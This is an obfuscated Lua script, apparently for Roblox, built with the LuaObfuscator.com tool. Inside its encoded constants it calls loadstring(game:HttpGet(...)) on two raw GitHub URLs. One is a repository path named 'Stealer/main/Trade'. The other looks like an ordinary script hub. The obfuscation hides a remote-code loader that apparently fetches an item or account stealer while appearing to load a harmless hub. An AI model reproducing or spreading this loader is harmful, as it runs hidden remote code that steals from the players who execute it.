--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v100=0;local v101;while true do if (v100==0) then v101=v5(v83,v19);v19=nil;v100=1;end if (v100==1) then return v101;end end else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(1637 -(1523 + 114)) -0 ;local v85;while true do if (v84==((0 + 0) -0)) then v85=(v31/((2 -0)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -((1922 -(68 + 997)) + 74)))) + (569 -(367 + 201)))) ;return v85-(v85%(928 -(214 + (1983 -(226 + 1044))))) ;end end else local v86=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (878 -((1227 -945) + 595))) or 0 ;end end local function v21() local v34=117 -(32 + 85) ;local v35;while true do if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + 1 + (0 -0) ;v34=1 + 0 ;end if (v34==((1770 -812) -(892 + 65))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v37 * (436 -(67 + 113))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 3 + 1 ;return (v41 * (16778168 -(802 + 150))) + (v40 * (176444 -(80729 + 30179))) + (v39 * ((1625 -(915 + 82)) -372)) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0)) then v45=1 -0 ;v46=(v20(v44,1188 -(1069 + 118) ,45 -25 ) * (((1 + 2) -1)^(6 + 26))) + v43 ;v42=3 -1 ;end if (v42==((8 + 2) -7)) then if (v47==(0 + 0)) then if (v46==(0 -(1055 -(87 + 968)))) then return v48 * (0 + 0) ;else local v102=(0 -0) + 0 ;while true do if (v102==(885 -(261 + 624))) then v47=1 -0 ;v45=(718 + 73) -(368 + 423) ;break;end end end elseif (v47==((14541 -8108) -4386)) then return ((v46==(18 -(10 + (1421 -(447 + 966))))) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1465 -(416 + 26)) ) * (v45 + (v46/((6 -4)^(1799 -(760 + 987))))) ;end if (((0 -0) + 0)==v42) then v43=v23();v44=v23();v42=1 -(1817 -(1703 + 114)) ;end if (v42==(440 -(145 + (994 -(376 + 325))))) then v47=v20(v44,787 -(745 + 21) ,461 -(44 + 386) );v48=((v20(v44,1518 -(998 + 488) )==(1 + 0)) and  -(1 -0)) or (3 -2) ;v42=3 + 0 ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;v50=1 + 1 + 0 ;end if (v50==(2 -0)) then v52={};for v89=2 -1 , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=17 -(9 + 5 + 0) ;end if ((379 -(85 + 291))==v50) then return v6(v52);end if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==(1265 -(243 + 1022))) then return "";end end v50=1 -0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 -0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v67=(function() return 0;end)();while true do if (v67~=1) then else if (v53==3) then for v103= #"]",v23() do local v104=(function() return v21();end)();if (v20(v104, #"!", #" ")==(0 + 0)) then local v111=(function() return 0;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (v111~=1) then else local v120=(function() return 0 -0 ;end)();while true do if (v120~=(1 -0)) then else v111=(function() return 1386 -(746 + 638) ;end)();break;end if (v120==(0 + 0)) then v114=(function() return {v22(),v22(),nil,nil};end)();if (v112==(341 -(218 + 123))) then local v168=(function() return 1581 -(1535 + 46) ;end)();local v169=(function() return;end)();while true do if (v168==(0 + 0)) then v169=(function() return 0 + 0 ;end)();while true do if (v169~=0) then else v114[ #"xnx"]=(function() return v22();end)();v114[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v112== #"{") then v114[ #"gha"]=(function() return v23();end)();elseif (v112==(562 -(306 + 254))) then v114[ #"asd"]=(function() return v23() -((1 + 1)^16) ;end)();elseif (v112== #"asd") then local v183=(function() return 0 -0 ;end)();while true do if (v183~=(1467 -(899 + 568))) then else v114[ #"asd"]=(function() return v23() -(2^16) ;end)();v114[ #"0313"]=(function() return v22();end)();break;end end end v120=(function() return 1;end)();end end end if (2==v111) then if (v20(v113, #"{", #".")== #"{") then v114[2]=(function() return v60[v114[2 + 0 ]];end)();end if (v20(v113,4 -2 ,2)== #"[") then v114[ #"nil"]=(function() return v60[v114[ #"asd"]];end)();end v111=(function() return 3;end)();end if (v111==3) then if (v20(v113, #"91(", #"gha")== #"\\") then v114[ #"xnxx"]=(function() return v60[v114[ #"0313"]];end)();end v55[v103]=(function() return v114;end)();break;end if (v111==(603 -(268 + 335))) then v112=(function() return v20(v104,292 -(60 + 230) , #"nil");end)();v113=(function() return v20(v104, #".dev",578 -(426 + 146) );end)();v111=(function() return 1;end)();end end end end for v105= #"!",v23() do v56,v105,v28=(function() return v54(v56,v105,v28);end)();end return v58;end if (v53~=(1 + 1)) then else v60=(function() return {};end)();for v106= #"<",v59 do local v107=(function() return 0;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v107==0) then v108=(function() return 1456 -(282 + 1174) ;end)();v109=(function() return nil;end)();v107=(function() return 1;end)();end if (v107==(812 -(569 + 242))) then v110=(function() return nil;end)();while true do if (v108==(2 -1)) then if (v109== #".") then v110=(function() return v21()~=(0 + 0) ;end)();elseif (v109==(1026 -(706 + 318))) then v110=(function() return v24();end)();elseif (v109== #"gha") then v110=(function() return v25();end)();end v60[v106]=(function() return v110;end)();break;end if (v108==(1251 -(721 + 530))) then local v123=(function() return 1271 -(945 + 326) ;end)();while true do if (v123==0) then v109=(function() return v21();end)();v110=(function() return nil;end)();v123=(function() return 2 -1 ;end)();end if ((1 + 0)==v123) then v108=(function() return 701 -(271 + 429) ;end)();break;end end end end break;end end end v58[ #"-19"]=(function() return v21();end)();v53=(function() return 3 + 0 ;end)();end break;end if (v67~=(1500 -(1408 + 92))) then else if (v53==(1086 -(461 + 625))) then local v98=(function() return 0;end)();while true do if (v98~=1) then else v56=(function() return {};end)();v53=(function() return 1289 -(993 + 295) ;end)();break;end if (v98~=0) then else v54=(function() return function(v115,v116,v117) local v118=(function() return 0 + 0 ;end)();local v119=(function() return;end)();while true do if ((1171 -(418 + 753))==v118) then v119=(function() return 0;end)();while true do if (v119~=(0 + 0)) then else v115[v116-#":" ]=(function() return v117();end)();return v115,v116,v117;end end break;end end end;end)();v55=(function() return {};end)();v98=(function() return 1 + 0 ;end)();end end end if (v53~=1) then else local v99=(function() return 0 + 0 ;end)();while true do if (v99~=(0 + 0)) then else v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v99=(function() return 1;end)();end if (v99==1) then v59=(function() return v23();end)();v53=(function() return 2;end)();break;end end end v67=(function() return 1;end)();end end end end local function v29(v61,v62,v63) local v64=v61[(3099 -(797 + 532)) -(1749 + 20) ];local v65=v61[1 + 1 ];local v66=v61[1325 -(1249 + 73) ];return function(...) local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=1 + 0 ;local v73= -(1146 -(339 + 127 + 679));local v74={};local v75={...};local v76=v12("#",...) -(2 -1) ;local v77={};local v78={};for v87=1900 -(106 + 606 + 1188) ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 + 0 ];else v78[v87]=v75[v87 + 1 + 0 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0 -0 ;while true do if (v88==0) then v80=v68[v72];v81=v80[2 -1 ];v88=115 -(4 + 110) ;end if ((4962>1721) and (v88==(2 -1))) then if ((802<=4833) and (v81<=(593 -(57 + 527)))) then if (v81<=(1431 -(41 + 1386))) then if ((2087==2087) and (v81<=(104 -(17 + 86)))) then if ((v81==(0 + (1202 -(373 + 829)))) or (4445<4149)) then local v124=(731 -(476 + 255)) -0 ;local v125;local v126;local v127;local v128;while true do if (v124==(2 -(1131 -(369 + 761)))) then v73=(v127 + v125) -1 ;v128=0;v124=168 -(122 + 44) ;end if ((v124==(2 -0)) or (1818==85)) then for v171=v125,v73 do local v172=0 -0 ;while true do if (v172==(0 + 0)) then v128=v128 + 1 + (0 -0) ;v78[v171]=v126[v128];break;end end end break;end if ((630<2127) and (v124==((0 -0) + 0))) then v125=v80[3 -1 ];v126,v127=v71(v78[v125](v13(v78,v125 + (66 -(30 + 35)) ,v80[3])));v124=1 + 0 ;end end else v72=v80[1260 -(1043 + 214) ];end elseif ((v81<=(7 -5)) or (1938==2514)) then do return;end elseif (v81>(241 -(64 + 174))) then v78[v80[(173 + 1041) -((477 -154) + 889) ]]();else local v151=v80[5 -3 ];local v152=v78[v80[583 -(361 + 219) ]];v78[v151 + (321 -(53 + 267)) ]=v152;v78[v151]=v152[v80[4]];end elseif (v81<=(2 + 4)) then if ((4255>=55) and (v81>(418 -((351 -(144 + 192)) + 398)))) then do return;end else for v147=v80[984 -(18 + 964) ],v80[3] do v78[v147]=nil;end end elseif ((2999>1156) and (v81<=(26 -19))) then local v130=v80[2 + 0 ];v78[v130]=v78[v130](v13(v78,v130 + 1 + 0 ,v73));elseif ((2350>1155) and (v81>(858 -(20 + 830)))) then local v156=v80[2 + 0 ];local v157,v158=v71(v78[v156](v13(v78,v156 + 1 ,v80[129 -(116 + 10) ])));v73=(v158 + v156) -1 ;local v159=0;for v165=v156,v73 do v159=v159 + 1 ;v78[v165]=v157[v159];end elseif (v78[v80[(217 -(42 + 174)) + 1 ]]==v80[4]) then v72=v72 + (739 -(542 + 196)) ;else v72=v80[6 -3 ];end elseif (v81<=(5 + 9)) then if (v81<=(6 + 5)) then if (v81==(4 + 6)) then v72=v80[7 -4 ];else v78[v80[4 -2 ]]=v63[v80[3]];end elseif (v81<=(1563 -(1126 + 425))) then local v135=v80[2 + 0 ];local v136=v78[v80[408 -(118 + 287) ]];v78[v135 + (3 -(2 + 0)) ]=v136;v78[v135]=v136[v80[4]];elseif (v81==(1134 -(118 + 1003))) then if (v78[v80[5 -3 ]]==v80[381 -(142 + 235) ]) then v72=v72 + (4 -3) ;else v72=v80[3];end else v78[v80[1 + 1 ]]=v63[v80[3]];end elseif ((4029<=4853) and (v81<=((422 + 571) -(553 + 424)))) then if ((v81>15) or (516>3434)) then v78[v80[(1507 -(363 + 1141)) -1 ]]=v80[(1583 -(1183 + 397)) + 0 ];else for v149=v80[2 + (0 -0) ],v80[2 + 1 ] do v78[v149]=nil;end end elseif ((4046>=3033) and (v81<=(6 + 2 + 9))) then v78[v80[2 + 0 ]]=v80[6 -3 ];elseif (v81==(49 -31)) then v78[v80[4 -2 ]]();else local v162=0 + 0 ;local v163;while true do if (v162==((0 + 0) -0)) then v163=v80[755 -(239 + 514) ];v78[v163]=v78[v163](v13(v78,v163 + 1 ,v73));break;end end end v72=v72 + 1 + (1975 -(1913 + 62)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5461646173682D31302F537465616C65722F6D61696E2F5472616465034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F546861745369636B2F412O7261794669656C642F6D61696E2F53796D70686F6E794875622E6C7561001A3O0012113O00014O000F000100013O0026083O0002000100010004013O00020001001211000100013O00260800010005000100010004013O0005000100120B000200023O00120B000300033O00200C000300030004001211000500054O0009000300054O000700023O00022O001200020001000100120B000200023O00120B000300033O00200C000300030004001211000500064O0009000300054O000700023O00022O00120002000100010004013O001900010004013O000500010004013O001900010004013O000200012O00063O00017O00",v9(),...);
